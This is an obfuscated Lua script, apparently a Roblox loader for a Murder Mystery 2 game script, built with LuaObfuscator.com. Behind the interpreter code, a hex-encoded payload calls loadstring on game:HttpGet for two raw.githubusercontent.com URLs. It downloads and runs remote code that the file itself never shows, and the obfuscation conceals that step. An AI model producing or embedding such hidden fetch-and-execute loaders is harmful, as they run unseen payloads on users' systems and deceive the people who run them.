--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v92=v5(v83,v19);v19=nil;return v92;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==((0 + 0) -0)) then v85=(v31/((879 -((1239 -(892 + 65)) + 595))^(v32-1)))%((3 -(2 -1))^(((v33-(1 + 0)) -(v32-(2 -1))) + (620 -((1025 -470) + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;end end else local v86=((1046 -476) -(367 + 201))^(v32-(4 -3)) ;return (((v31%(v86 + v86))>=v86) and ((1278 -(87 + 263)) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=180 -(67 + 113) ;local v35;while true do if (v34==((953 -(802 + 150)) + 0)) then return v35;end if (v34==(0 -(0 -0))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=3 -2 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==((2 -1) + 0)) then return (v38 * 256) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;v36=998 -(915 + 82) ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * (29809750 -13032534)) + (v42 * (65012 + (1672 -1148))) + (v41 * (1047 -(368 + 182 + 241))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (21 -(10 + 8)) );v18=v18 + (15 -11) ;v39=443 -(416 + (45 -19)) ;end end end local function v24() local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(441 -(145 + 293))) then if (v49==(430 -(44 + 386))) then if (v48==(1486 -(998 + 488))) then return v50 * 0 ;else v49=1 + 0 + 0 ;v47=0;end elseif (v49==(1677 + 291 + 79)) then return ((v48==(772 -(201 + 571))) and (v50 * ((1139 -(116 + 1022))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(601 + 422) ) * (v47 + (v48/((7 -5)^(184 -132)))) ;end if (v44==(860 -(814 + 45))) then v47=2 -(1056 -(87 + 968)) ;v48=(v20(v46,1 + 0 ,8 + (52 -40) ) * ((887 -(261 + 624))^(56 -24))) + v45 ;v44=1082 -(1020 + 60) ;end if ((1423 -(630 + 793))==v44) then v45=v23();v46=v23();v44=3 -2 ;end if ((9 -7)==v44) then v49=v20(v46,9 + 11 + 1 ,106 -75 );v50=((v20(v46,1779 -(760 + 987) )==((4326 -2412) -(1789 + 124))) and  -((2180 -(447 + 966)) -(745 + 21))) or (1 + 0) ;v44=7 -4 ;end end end local function v25(v51) local v52=(0 -0) -0 ;local v53;local v54;while true do if (v52==(1819 -(1703 + 114))) then v54={};for v93=1 + 0 , #v53 do v54[v93]=v2(v1(v3(v53,v93,v93)));end v52=704 -((1556 -(1123 + 57)) + 325) ;end if (1==v52) then v53=v3(v16,v18,(v18 + v51) -(1 -0) );v18=v18 + v51 ;v52=5 -3 ;end if ((0 + 0)==v52) then v53=nil;if  not v51 then local v103=0 -0 ;while true do if (v103==(14 -(9 + 5))) then v51=v23();if (v51==(376 -(85 + 291))) then return "";end break;end end end v52=1;end if (v52==(1268 -(243 + 1022))) then return v6(v54);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=(function() return 241 -(187 + 54) ;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v55~=(782 -(162 + 618))) then else for v95= #",",v23() do local v96=(function() return v21();end)();if (v20(v96, #".", #".")~=0) then else local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if ((2 + 0)~=v104) then else if (v20(v106, #"[", #"/")== #" ") then v107[2 + 0 ]=(function() return v61[v107[3 -1 ]];end)();end if (v20(v106,2 -0 ,1 + 1 )== #"{") then v107[ #"-19"]=(function() return v61[v107[ #"gha"]];end)();end v104=(function() return 3;end)();end if (3==v104) then if (v20(v106, #"xnx", #"nil")== #"<") then v107[ #"http"]=(function() return v61[v107[ #"http"]];end)();end v56[v95]=(function() return v107;end)();break;end if (v104==0) then local v115=(function() return 0;end)();while true do if (v115==1) then v104=(function() return 1637 -(1373 + 263) ;end)();break;end if (v115==(1000 -(451 + 549))) then v105=(function() return v20(v96,1 + 1 , #"nil");end)();v106=(function() return v20(v96, #"asd1",6);end)();v115=(function() return 1;end)();end end end if (v104~=(1 -0)) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 -0)) then local v144=(function() return 0;end)();local v145=(function() return;end)();while true do if (v144~=0) then else v145=(function() return 1384 -(746 + 638) ;end)();while true do if (v145==0) then v107[ #"91("]=(function() return v22();end)();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"]") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==(1 + 1)) then v107[ #"xxx"]=(function() return v23() -(2^16) ;end)();elseif (v105== #"xnx") then local v181=(function() return 0;end)();while true do if (v181==0) then v107[ #"-19"]=(function() return v23() -((2 -0)^16) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end end v104=(function() return 343 -(218 + 123) ;end)();end end end end for v97= #"]",v23() do v57[v97-#"}" ]=(function() return v28();end)();end return v59;end if (v55~= #":") then else local v90=(function() return 1581 -(1535 + 46) ;end)();while true do if (v90~=1) then else for v109= #"<",v60 do local v110=(function() return 0 + 0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110==1) then v113=(function() return nil;end)();while true do if (v111== #".") then if (v112== #":") then v113=(function() return v21()~=0 ;end)();elseif (v112==2) then v113=(function() return v24();end)();elseif (v112== #"-19") then v113=(function() return v25();end)();end v61[v109]=(function() return v113;end)();break;end if (v111==0) then local v163=(function() return 0 + 0 ;end)();while true do if (v163==(561 -(306 + 254))) then v111=(function() return  #"]";end)();break;end if (v163==0) then v112=(function() return v21();end)();v113=(function() return nil;end)();v163=(function() return 1;end)();end end end end break;end if ((0 + 0)==v110) then local v116=(function() return 0;end)();while true do if (v116==1) then v110=(function() return 1;end)();break;end if ((0 -0)~=v116) then else v111=(function() return 0;end)();v112=(function() return nil;end)();v116=(function() return 1;end)();end end end end end v59[ #"gha"]=(function() return v21();end)();v90=(function() return 1469 -(899 + 568) ;end)();end if (v90~=(0 + 0)) then else v60=(function() return v23();end)();v61=(function() return {};end)();v90=(function() return 1;end)();end if (v90==(4 -2)) then v55=(function() return 2;end)();break;end end end if (v55==(603 -(268 + 335))) then local v91=(function() return 290 -(60 + 230) ;end)();while true do if (v91~=(574 -(426 + 146))) then else v55=(function() return  #">";end)();break;end if (v91~=(1 + 0)) then else v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v91=(function() return 1458 -(282 + 1174) ;end)();end if (v91~=(811 -(569 + 242))) then else v56=(function() return {};end)();v57=(function() return {};end)();v91=(function() return 2 -1 ;end)();end end end end end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[1026 -(706 + 318) ];local v67=v62[3];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -(1252 -(721 + 530));local v74={};local v75={...};local v76=v12("#",...) -(1272 -(945 + 190 + 136)) ;local v77={};local v78={};for v87=0 -0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 + 0 ];end end local v79=(v76-v70) + (701 -(271 + 429)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if ((2994>858) and (v81<=(10 + 0 + 0))) then if ((v81<=(1504 -(1408 + 92))) or (3755<=915)) then if (v81<=(1087 -(264 + 197 + 625))) then if (v81==(1288 -(993 + 295))) then local v117=0 + 0 ;local v118;while true do if (v117==(1171 -(418 + 753))) then v118=v80[1 + 1 ];v78[v118](v78[v118 + (2 -1) + 0 ]);break;end end else local v119=v80[1 + 1 ];local v120,v121=v71(v78[v119](v13(v78,v119 + 1 + 0 ,v80[3])));v73=(v121 + v119) -(530 -(406 + 123)) ;local v122=0;for v146=v119,v73 do local v147=1769 -(1749 + 20) ;while true do if ((3946>3743) and (v147==(0 + 0))) then v122=v122 + 1 ;v78[v146]=v120[v122];break;end end end end elseif ((v81<=2) or (1335>=3306)) then v78[v80[1324 -(1249 + (202 -129)) ]]=v80[2 + 1 ];elseif (v81>((2570 -1422) -(466 + 679))) then local v148=v80[4 -2 ];v78[v148]=v78[v148](v13(v78,v148 + (2 -1) ,v73));else v78[v80[1902 -(106 + 1794) ]]();end elseif ((4844>2253) and (v81<=(3 + 4))) then if (v81<=5) then local v125=0 + 0 ;local v126;while true do if (v125==((0 + 0) -0)) then v126=v80[5 -(14 -11) ];v78[v126](v78[v126 + (115 -(4 + 110)) ]);break;end end elseif (v81==(590 -(57 + 527))) then local v150=0;local v151;local v152;while true do if ((452==452) and (v150==(1428 -(41 + 1386)))) then v78[v151 + (104 -(17 + 86)) ]=v152;v78[v151]=v152[v80[3 + 1 ]];break;end if (v150==(0 -0)) then v151=v80[5 -3 ];v152=v78[v80[169 -(122 + 44) ]];v150=1 -0 ;end end else do return;end end elseif (v81<=(26 -18)) then local v127=v80[2 + 0 ];local v128=v78[v80[3]];v78[v127 + 1 + 0 ]=v128;v78[v127]=v128[v80[4]];elseif (v81>9) then v78[v80[3 -1 ]]=v29(v69[v80[3]],nil,v64);else v72=v80[(821 -(239 + 514)) -(30 + 35) ];end elseif ((v81<=(11 + 4)) or (4557<2087)) then if (v81<=((446 + 823) -(1043 + 214))) then if (v81==(1340 -(797 + 532))) then v78[v80[2]]=v29(v69[v80[11 -8 ]],nil,v64);else v72=v80[1215 -(323 + 646 + 243) ];end elseif (v81<=(34 -21)) then v78[v80[2]]=v64[v80[583 -(361 + 219) ]];elseif (v81==(334 -(18 + 35 + 267))) then local v155=v80[1 + 1 ];v78[v155]=v78[v155](v13(v78,v155 + (414 -(15 + 398)) ,v73));else v78[v80[984 -(18 + 964) ]]();end elseif (v81<=((157 -90) -49)) then if (v81<=16) then do return;end elseif ((3874==3874) and (v81==(10 + 7))) then if ((v78[v80[2 + (1202 -(373 + 829)) ]]==v80[854 -((751 -(476 + 255)) + 830) ]) or (1938>4935)) then v72=v72 + 1 + 0 ;else v72=v80[(1259 -(369 + 761)) -(116 + 10) ];end else v78[v80[2]]=v80[1 + 2 ];end elseif (v81<=(757 -(542 + 196))) then local v136=0 -0 ;local v137;local v138;local v139;local v140;while true do if (v136==(1 + 0)) then v73=(v139 + v137) -(1 + 0 + 0) ;v140=0 + 0 ;v136=4 -2 ;end if (v136==(4 -2)) then for v170=v137,v73 do local v171=(2816 -1265) -(1126 + (805 -380)) ;while true do if (v171==0) then v140=v140 + 1 ;v78[v170]=v138[v140];break;end end end break;end if (v136==(405 -((356 -(64 + 174)) + 287))) then v137=v80[2];v138,v139=v71(v78[v137](v13(v78,v137 + (3 -2) ,v80[1124 -(118 + 1003) ])));v136=1;end end elseif (v81==(58 -38)) then v78[v80[379 -(142 + 235) ]]=v64[v80[(2 + 11) -10 ]];elseif (v78[v80[1 + 1 ]]==v80[(1452 -471) -(553 + 424) ]) then v72=v72 + (1 -(336 -(144 + 192))) ;else v72=v80[3 + 0 ];end v72=v72 + 1 + (216 -(42 + 174)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q0003053Q00737061776E030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F456B733076612F2Q4D325363726970742F726566732F68656164732F6D61696E2F506C6F7900103Q0012023Q00013Q0026153Q00010001000100040C3Q00010001001214000100023Q00020B00028Q000100020001001214000100033Q001214000200043Q002006000200020005001202000400064Q0013000200044Q000E00013Q00022Q000F00010001000100040C3Q000F000100040C3Q000100012Q00103Q00013Q00013Q00043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403443Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F456B733076612F2Q6D322Q6D322F726566732F68656164732F6D61696E2F793Q6500083Q0012143Q00013Q001214000100023Q002006000100010003001202000300044Q0013000100034Q000E5Q00022Q000F3Q000100012Q00103Q00017Q00",v9(),...);
